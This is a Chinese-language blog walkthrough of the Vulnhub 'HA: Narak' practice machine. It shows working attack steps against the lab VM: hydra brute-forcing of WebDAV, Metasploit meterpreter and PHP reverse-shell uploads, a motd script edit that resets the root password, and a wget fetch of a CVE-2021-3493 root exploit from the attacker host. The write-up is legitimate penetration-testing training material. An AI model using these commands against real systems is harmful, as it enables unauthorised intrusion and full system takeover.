Vulnhub-Narak靶场

最新推荐文章于 2024-02-22 13:58:02 发布
最新推荐文章于 2024-02-22 13:58:02 发布
阅读量845 收藏 6
点赞数 3
分类专栏: Vulnhub靶场 文章标签: 安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nicai321/article/details/122220694
版权

本篇主要对Vulnhub中Narak靶场进行练习:

通过对此靶场的练习,熟练掌握初步信息收集、目录发现、MSF利用、NC反弹、口令爆破、提权等知识;全方位细致演示,笔记只为勉励自己,本人只是一个努力上山的人,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

靶机下载地址:
https://www.vulnhub.com/entry/ha-narak,569/
信息收集:
通过masscan 快速发现地址及端口:

masscan -p 1-65535 192.168.45.0/24 -e eth0 --rate=100000

发现192.168.45.136 开放22,80端口:
在这里插入图片描述
拨测80端口,发现web页面:
在这里插入图片描述
使用目录探测工具:

dirb http://192.168.45.136/

发现webdav目录:
在这里插入图片描述
这里同样可以使用dirsearch.py来进行目录扫描:
python3 dirsearch.py -u http://192.168.45.136 -f -w /usr/share/wordlists/dirb/common.txt
在这里插入图片描述

WebDAV基于HTTP的通信协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新方法,使应用程序可对web Server直接读写, 并支持写文件锁定及解锁,还可以支持文件的版本控制。
常用的文件共享有三种: FTP、Samba、WebDAV。

通过爆破的方式去登录WebDAV,这里使用cewl来制作字典:
cewl会通过爬行网页,把网页上发现的词生成字典:

cewl http://192.168.45.136/ -w wt.txt

在这里插入图片描述
使用hydra对账号密码进行爆破:

hydra -L wt.txt -P wt.txt 192.168.45.136 http-get /webdav

获取账号:yamdoot 密码:Swarg
在这里插入图片描述
成功登录WebDAV:
在这里插入图片描述
第一种方法:通过msf来进行木马上传:
通过use exploit/windows/http/xampp_webdav_upload_php攻击载荷来进行测试:

set payload php/meterpreter/reverse_tcp
set RHOST 192.168.45.136
set USERNAME yamdoot
set PASSWORD Swarg
set LHOST 192.168.45.135

在这里插入图片描述
运行上传的PHP文件后,成功反弹
在这里插入图片描述
通过回退目录 发现3个用户:

inferno narak yamdoot

在这里插入图片描述
在mnt里面发现两个文件:
在这里插入图片描述

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

这一段使用的是Brainfuck加密,通过在线解密得出:chitragupt
在这里插入图片描述

eWFtZG9vdDpTd2FyZw==

这一段使用的是base64加密 ,就是之前我们爆破登录成功的账号和密码:
在这里插入图片描述
前期端口扫描的时候,发现开放22 和 80端口,我们可以通过获取到密码,去尝试登录账号:

inferno  chitragupt

在这里插入图片描述
成功登录获取第一个flag。
使用msf的时候,在meterpreter中同样可以进行文件上传啊,使用shell后提升交互,然后提权等等:

upload /root/Desktop/CVE-2021-3493-main/exp

在这里插入图片描述
在这里插入图片描述

第二种方法:使用webdav上传,利用nc监听并反弹shell:
准备shell,编辑监听地址:

cp /usr/share/webshells/php/php-reverse-shell.php .

在这里插入图片描述
使用Webdav命令将php木马上传靶机:
在这里插入图片描述
成功反弹获取shell,使用python 来提升交互shell:
如果靶机里面有python2同样可以使用第一种命令,根据实际情况而定:

python -c "import pty;pty.spawn('/bin/bash')"

python3 -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
使用之前的账号密码通过ssh登录:
在这里插入图片描述
或者直接在交付shell上面进目录查看:
在这里插入图片描述
第二个flag获取方法有两种:
第一种:使用motd提权,在文件中最后一行写入命令,将root密码替换掉,切换root用户获取。

motd = message of the day 用户登录系统时弹出的欢迎信息,默认是放在/etc/update-motd.d/的shell脚本。这些脚本文件就是当用户登录时就能以root用户身份执行一段代码。故尝试修改其中某个脚本,当每次登录系统就把root用户密码修改为一个已知的密码。

通过命令查找可写、可执行的文件:

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

在文件中写入:

 echo "echo 'root:123456'| chpasswd">>00-header

在这里插入图片描述
退出再次登录 切换用户root ,使用之前写进去的密码123456 成功登录 获取第二个flag:
在这里插入图片描述
第二种,通过gcc编译提权文件,上传执行后,提权至root获取:
通过https://github.com/briskets/CVE-2021-3493 下载提权文件:
使用gcc将提权文件编译成可执行文件:

gcc exploit.c -o exploit

在这里插入图片描述
本地开启80端口,提供下载:
通过wget 传送至靶机上:

wget http://192.168.45.135/exploit /tmp/exploit

在这里插入图片描述
赋予执行权限:并成功提权,切换root目录下 查看root.txt 获取第二个flag:
在这里插入图片描述
本次靶场完美结束,这里提一句,当获取权限后,就可以直接查看flag,及提权后flag获取。可不用解密;只是多个解密小知识点。
在这里插入图片描述

全局变量Global
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
【新手向】VulnHub靶场MONEYBOX 1 详细解析,通过五轮面试斩获offer阿里实习生亲述
2401_83739503的博客
04-14 508
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
攻击narak靶场
qq_62638044的博客
03-16 444
攻击narak靶场
靶场练习第三天~vulnhub靶场narak
qq_57976347的博客
01-28 919
靶机下载链接: https://pan.baidu.com/s/1GxcSL6efwd0GcbY45WsD0A 提取码: dhr5 一、信息收集 1.使用namp 192.168.101.0/24扫描该网段的地址,寻找靶机IP 2.直接访问192.168.101.102 3.进行目录扫描,dirb目录扫描工具(kali自带的),使用命令dirb http://192.168.101.102,扫描后发现有3个网址,发现有webdav网址 二、利用webdav客户端,思路:cadav..
Narak靶机渗透
weixin_56306210的博客
01-31 334
Narak靶机渗透
Vulnhub靶场渗透-narak
paidx0
09-19 943
前言 靶机IP(192.168.110.131) 攻击机IP(192.168.110.127) 网络连接NAT模式 不多说直接开始吧 信息收集 还是常规的先扫端口和目录 先访问网页看看都有些什么,扫到的目录也打开看看 主页没啥东西全都是图片,注意到webdav可以打开,但需要连接的账号密码 所以现在的思路就是可能需要通过 webdav来上传文件,再访问拿到webshell 漏洞挖掘 现在考虑通过爆破的方式去登录 webdav,但是爆破需要一个好用的字典 这里可以用 cewl 来制作字典 cew
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7120
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机是 NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
Google搜索引擎算法的秘密
05-18
Google搜索引擎算法的秘密
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1602
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2450
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5818
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1414
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
VulnHub靶场HA: NARAK练习 - 修改00-header文件进行提权
qq_43232893的博客
10-15 608
VulnHub靶场HA: NARAK练习简介开始 简介 攻击机ip:192.168.255.139 靶机ip: 192.168.255.142 靶机下载地址: 开始 使用nmap找到靶机地址并扫描端口 找到靶机ip,使用nmap -sV -Pn -p- -v 192.168.255.142进行端口扫描 发现开启了个80跟22端口,访问一下80端口: 什么都没有,再看看有没有敏感目录 发现了一个401登录界面 利用cewl生成字典 cewl 192.168.255.142 -w 1.txt 再使
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1587
Vulnhub靶场Prime_Series_Level-1渗透
vulnhub靶场-AdmX
qq_42947816的博客
05-29 1286
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
带你玩转渗透测试靶场Vulnhub——hacksudo3
m0_74025111的博客
04-24 445
从目录里面发现/hidden/ 我们先去访问一下http://192.168.1.108/hidden,由此发现好像是一个解密的。我们先来访问默认的登录页面:http://192.168.1.108/login.php 竟然发现了这个网页的登录页面。继续访问下一个,http://192.168.1.108/decrypt/ 发现这个也是一个解密的网站。访问:http://192.168.1.108/bruteforce/这也是一个解密用的网站。以上的命令都可以执行的话,证明是存在命令注入漏洞的。
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-07 2105
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 2765
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
[VulnHub靶机渗透] HA: Narak
最新发布
人若无名,便可专心练剑
02-22 1336
学渗透必打百台靶机实操精讲-Narak。涉及UDP突破,TFTP信息泄漏,webdav反弹shell上传。二级提权,第一级通过找到可写bash脚本文件中的brainfuck语句,获得凭据,二级通过motd脚本获得root权限。相比之前的视频,增加了些新知识,值得玩味的攻击链。可以结合靶机实操。
VulnHub narak
weixin_45682839的博客
10-21 1092
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

全局变量Global

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值